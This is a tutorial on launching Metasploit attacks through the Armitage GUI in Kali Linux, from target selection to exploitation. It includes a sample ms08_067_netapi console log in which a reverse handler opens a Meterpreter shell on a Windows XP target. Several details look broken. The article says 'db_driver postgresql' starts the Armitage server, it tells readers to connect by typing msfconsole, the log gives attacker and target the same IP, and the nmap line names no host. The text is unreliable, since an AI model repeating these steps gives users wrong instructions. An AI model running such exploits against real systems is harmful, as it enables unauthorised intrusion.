How to Use the Armitage GUI for Metasploit in Kali Linux

Install Armitage

Armitage is a GUI for Metasploit that makes it easier to use. It is available for Kali Linux and can be installed with the following command: apt-get install armitage. Once the installation is complete, you can start Armitage by typing armitage in the terminal. You will then be prompted to connect to Metasploit, which you can do by typing msfconsole. After connecting to Metasploit, you can select a target and an exploit to launch the attack. You can monitor the attack by using the Armitage GUI. For more information on how to use Armitage, please refer to the official documentation.

Start Armitage

In order to start Armitage, you need to open a terminal window in Kali Linux. To do this, click on the terminal icon in the top left corner of the screen. Once the terminal window is open, type in the following command: armitage and press enter. This will start the Armitage GUI.

If you are using a version of Kali Linux that does not have Armitage installed, you can download it from the Fast and Easy Hacking website. Once you have downloaded the zip file, extract it and then run the armitage command from the extracted folder.

Once Armitage is running, you will be presented with a graphical user interface (GUI) that allows you to connect to Metasploit and launch attacks.

Connect to Metasploit

In order to use Armitage, you must first connect it to Metasploit. To do this, open a terminal window and type the following command: msfconsole. This will launch the Metasploit console. Once the console is open, type the following command to start the Armitage server: db_driver postgresql. This will start the PostgreSQL database driver, which is required for Armitage to connect to Metasploit. Once the driver is running, type the following command to connect Armitage to Metasploit: armitage. This will launch the Armitage GUI. You should now be able to see the Armitage GUI window.

Select a Target

Once you have connected to Metasploit, you can select a target to attack. To do this, you will need to use the Armitage GUI. In the left-hand pane, you will see a list of available targets. Select the target you want to attack by clicking on it. You can also use the search bar to find a specific target. Once you have selected a target, you can view its details in the right-hand pane. This includes the target's IP address, operating system, and open ports. You can also use the nmap command to scan the target for more information.

nmap -sV -O 

Once you have identified the target, you can move on to selecting an exploit.

Select an Exploit

Once you have connected to Metasploit and selected a target, it's time to select an exploit. Armitage provides a wide range of exploits to choose from. To select an exploit, click on the "Exploits" tab in the top menu. This will open a list of available exploits. You can filter the list by type, platform, port, and other criteria. Once you have found the exploit you want to use, click on it to select it.

Once you have selected an exploit, you can view the details of the exploit by clicking on the "Details" tab. This will show you the description of the exploit, the target platform, the port, and other information. You can also view the code of the exploit by clicking on the "Code" tab. This will show you the code of the exploit in the programming language it was written in.

Once you have selected an exploit and reviewed the details, you can launch the attack. To do this, click on the "Launch" button at the bottom of the window. This will launch the exploit and start the attack.

Launch the Attack

Once you have selected an exploit and configured the options, you can launch the attack. To do this, click the "Launch" button in the bottom right corner of the Armitage GUI. This will send the exploit to the target machine and attempt to gain access. You can monitor the progress of the attack in the "Console" tab. If the attack is successful, you will see a message in the console indicating that a session has been established. You can then use the session to execute commands on the target machine. To do this, simply type the command into the console and press enter.

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Launching the exploit...
[*] Sending stage (749056 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.1:1040) at 2020-09-17 11:45:02 -0400

For more information on using the Armitage GUI for Metasploit in Kali Linux, please refer to the Metasploit Unleashed tutorial.

Monitor the Attack

Once you have launched the attack, you can monitor the progress of the attack in the Armitage GUI. To do this, you will need to open the Hosts tab in the left-hand pane. This will show you the list of hosts that you have targeted. You can then click on each host to view the progress of the attack. You can also view the output of the attack in the Console tab. This will show you the output of the attack as it is happening. You can also use the Sessions tab to view the active sessions that have been created by the attack. This will allow you to interact with the target machine and execute commands on it. Finally, you can use the Reports tab to view the results of the attack. This will show you the results of the attack, such as the number of hosts that were successfully exploited and the data that was retrieved from the target machine.

It is important to note that the Armitage GUI is only one of the many tools available in Kali Linux for monitoring and managing Metasploit attacks. For more information on using Metasploit in Kali Linux, you can refer to the official Kali Linux documentation.

Useful Links